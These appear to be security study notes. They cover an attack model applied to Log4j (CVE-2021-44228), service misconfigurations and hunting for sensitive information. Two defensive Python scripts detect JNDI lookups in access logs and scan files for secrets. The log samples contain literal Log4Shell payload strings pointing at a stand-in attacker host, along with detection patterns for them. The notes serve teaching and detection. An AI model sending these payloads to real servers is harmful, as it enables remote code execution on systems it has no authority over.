1. Protocol-specific attacks
I. Attack Concepts: Source-Process-Privileges-Destination (SPPD)
Core Idea: Attacks follow a linear pattern:
Source: Information input (code, libraries, configs, APIs, user input).
Process: Information handling (PID, input, data processing, variables, logging).
Privileges: Access control (system, user, groups, policies, rules).
Destination: Outcome (local storage/processing, network transfer).
Log4j Example (CVE-2021-44228):
Source: A manipulated HTTP User-Agent header containing a JNDI lookup string.
Process: Log4j parses the logged value as a lookup expression instead of plain text and performs the lookup.
Privileges: Typically administrative, because the lookup runs with the privileges of the logging process.
Destination: The attacker-controlled server, which serves a malicious Java class; the result is remote code execution (RCE).
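To make the SPPD trace concrete, here is an added example (not part of the original notes) that walks web-server access log lines and, for each request whose User-Agent carries a JNDI lookup, records the three SPPD elements a responder can recover from the log: the Source (client IP and header), the Process (the lookup expression Log4j would evaluate), and the Destination (the host the lookup points at). The log lines, IP addresses and the host name attacker.invalid are constructed for this example; the lower/upper unwrapping handles a common way the literal word "jndi" is split across nested lookups so that naive string matching misses it.

```python
import re

# Constructed combined-format access log lines (sample data for this example only).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 734 "-" '
    '"${jndi:ldap://attacker.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 200 88 "-" '
    '"${${lower:j}ndi:rmi://attacker.invalid/b}"',
    '198.51.100.2 - - [10/Dec/2021:10:00:04 +0000] "POST /search HTTP/1.1" 200 12 "-" "curl/7.79.1"',
]

# ${lower:x} / ${upper:x} wrappers that split up the literal token "jndi".
NESTED_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# A JNDI lookup once the wrappers are gone: ${jndi:<target>}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([^}]+)\}", re.IGNORECASE)


def normalise(field):
    """Repeatedly strip case-lookup wrappers so nested forms collapse to their literal text."""
    previous = None
    while previous != field:
        previous = field
        field = NESTED_CASE_LOOKUP.sub(lambda m: m.group(1), field)
    return field


def user_agent_of(line):
    """In combined log format the User-Agent is the last double-quoted field."""
    quoted = re.findall(r'"([^"]*)"', line)
    return quoted[-1] if quoted else ""


def find_jndi_lookups(lines):
    """Return one SPPD-style record per log line whose User-Agent contains a JNDI lookup."""
    hits = []
    for line in lines:
        raw_ua = user_agent_of(line)
        expression = normalise(raw_ua)
        match = JNDI_LOOKUP.search(expression)
        if not match:
            continue
        hits.append({
            "client": line.split(" ", 1)[0],     # Source: who sent the header
            "user_agent": raw_ua,                # Source: the header as logged
            "lookup": match.group(0),            # Process: what Log4j would evaluate
            "lookup_target": match.group(1),     # Destination: where the lookup points
        })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f'{hit["client"]} -> {hit["lookup_target"]}  (from UA {hit["user_agent"]!r})')
```

Running the script against a real access log is a matter of replacing SAMPLE_LOG_LINES with the file's lines; the normalise step is deliberately limited to lower/upper wrappers, so treat any remaining `${` in a User-Agent as worth a manual look rather than relying on this one pattern.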
II. Service Misconfigurations
Common Issues:
Default credentials (admin:admin, etc.).
Weak/no passwords.
Anonymous authentication.
Misconfigured access rights (RBAC, ACL).
Unnecessary defaults (enabled features, open ports).
OWASP Top 10 Relevance:
Unnecessary features.
Default accounts.
Verbose error handling that reveals sensitive information.
Prevention:
Lock down critical infrastructure.
Disable unnecessary features/ports.
Enforce strong passwords.
Regular scans/audits.
Repeatable hardening process.
Minimal platforms.
Patch management.
Segmented architecture.
Security Headers.
Automated verification.
III. Finding Sensitive Information
Detective Approach: Gather all details.
Examples:
Usernames, email addresses.
Passwords, DNS records, IPs.
Source code, configuration files.
Personally Identifiable Information (PII).
Key Services:
File shares (FTP, SMB).
Email (SMTP).
Databases (SQL).
Process:
Understand the service.
Know what to look for (target-specific).
Use all available information.
Tools:
Nmap, Metasploit, sqlmap, grep, find, custom scripts.
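The grep/find step above, as an added example (not code from the original notes), written from the defender's side: a scanner that walks a code base or configuration tree and flags the categories of sensitive information the section lists (credentials, private keys, email addresses, IP addresses), reporting file, line and category while redacting the matched value so the report itself does not leak the secret. The in-memory sample files, their contents and the hostnames and addresses in them are constructed for this example; scan_directory is the same logic applied to a real path.

```python
import re
from pathlib import Path

# Constructed in-memory "repository" so the example runs offline (sample data only).
SAMPLE_FILES = {
    "config/database.yml": "production:\n  host: 10.0.0.12\n  username: dbadmin\n  password: Summer2021!\n",
    "src/notify.py": "SUPPORT_EMAIL = 'helpdesk@example.com'\n\ndef send(msg):\n    return msg\n",
    "deploy/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXkt...\n-----END OPENSSH PRIVATE KEY-----\n",
    "README.md": "Run make test before pushing.\n",
}

# Category -> pattern. For 'credential' the second group is the secret value itself.
PATTERNS = {
    "credential": re.compile(r"(?i)\b(password|passwd|pwd|secret|api[_-]?key|token)\b\s*[:=]\s*(\S+)"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}


def redact(value):
    """Keep a two-character prefix so a finding is recognisable without reproducing the secret."""
    return value[:2] + "***" if len(value) > 2 else "***"


def scan_text(path, text):
    """Return a list of findings for one file's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for category, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                # For patterns with groups, the last group holds the sensitive part.
                sensitive = match.group(match.lastindex or 0)
                findings.append({
                    "file": path,
                    "line": lineno,
                    "category": category,
                    "sample": redact(sensitive),
                })
    return findings


def scan_files(files):
    """Scan a mapping of path -> text (used here with the constructed sample)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def scan_directory(root):
    """Scan every regular file under root; binary or undecodable files are skipped."""
    findings = []
    for file_path in Path(root).rglob("*"):
        if not file_path.is_file():
            continue
        try:
            text = file_path.read_text(encoding="utf-8")
        except (UnicodeDecodeError, OSError):
            continue
        findings.extend(scan_text(str(file_path), text))
    return findings


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(f'{finding["file"]}:{finding["line"]}  {finding["category"]:12} {finding["sample"]}')
```

The patterns are intentionally broad (an IPv4 regex will also flag version strings), so the output is a triage list for a human, not a verdict; the value of the exercise is knowing which categories appear where before an attacker does.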
IV. General Attack Notes
Every piece of information is valuable.
Misconfigurations lead to information leaks and potential RCE.
Privilege escalation is a critical attack vector.
Automation helps in information gathering.
Real-world scenarios and case studies are vital.
Attack flow diagrams visualize SPPD.